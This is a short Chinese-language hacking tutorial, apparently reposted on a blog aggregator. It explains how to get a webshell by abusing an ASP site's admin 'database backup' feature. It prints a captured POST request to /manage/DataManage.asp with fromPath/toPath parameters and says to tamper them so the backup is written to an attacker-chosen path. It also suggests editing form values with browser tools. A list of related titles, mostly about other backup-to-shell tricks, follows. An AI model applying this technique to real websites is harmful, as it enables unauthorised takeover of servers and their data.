简单突破数据库备份路径拿shell
来源:互联网 发布:逛淘宝费多少流量 编辑:程序博客网 时间:2024/05/29 17:37
当后台可以数据库备份的时候,你是否顿时笑了?可当备份路径不能修改,而且后缀是mdb不变,你情何以堪? 这里就说个很简单的办法,进行一次数据库备份,并抓包下来。
POST /manage/DataManage.asp?From=Confirm&Action=DataBackup&Result=Site HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/QVOD, application/QVOD, */*
Referer: http://www.xxx.com.cn/manage/DataManage.asp? From=Confirm&Action=DataBackup&Result=Site Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate
Host: www.xxx.com.cn
Content-Length: 82
Connection: Keep-Alive Cache-Control: no-cache
Cookie: ASPSESSIONIDSADBRDSC=DOELADFALPBDPFKKHJGKGOAO; cnzz_a1183540=0; sin1183540=; rtime=0; ltime=1307114195812; cnzz_eid=78248833-1307114200-
fromPath=..%2FDatabase%2Fameav_Site.mdb&toPath=..%2FDatabase%2FBak_ameav_Site.mdb
然后...然后...然后改路径,提交啊,路径可全在这了。 此外,如果RP够好.在提交表单的时候程序先从表单读值再执行备份的话,可以更YD..NC也不用了 1.如果你是用的火狐浏览器,装个Firebug 插件.即可随意YY~~ 2.用的IE浏览器,可以使用啊D写的IE恶搞迷进行修改.不过大多时候是调用的网页,你需要找到真实的目标网页.才能去往真实的世界 :D
- 简单突破数据库备份路径拿shell
- lOG备份拿SHELL
- mssql差异备份拿shell
- 简单的shell数据库备份脚本
- linux shell简单实现数据库自动备份
- 渗透必备:linux下备份拿shell
- MSSQL2005差异备份拿shell (MSSQL2005 Backup Get Shell)
- shell脚本备份恢复oracle数据库简单示例
- 一个备份MySQL数据库的简单Shell脚本
- 一个备份MySQL数据库的简单Shell脚本
- 一个备份MySQL数据库的简单Shell脚本
- 一个备份MySQL数据库的简单Shell脚本
- 一个备份MySQL数据库的简单Shell脚本
- 一个备份MySQL数据库的简单Shell脚本
- phpweb后台拿shell简单方法
- postgre数据库备份shell
- SHELL 备份Mysql数据库
- 数据库备份得shell。
- tomcat6 nio
- 时间,偷偷的在流走
- if 是什么东西啊
- if 是什么东西啊
- 使用perl计算日期
- 简单突破数据库备份路径拿shell
- Perl调试器的用法
- C++引用
- SQL高级编程
- SQL高级编程
- java泛型中的pecs法则
- iBATIS sql中的处理特殊符号的做法
- 5530,图像和视频无法显示
- 4pm 方法操datagrid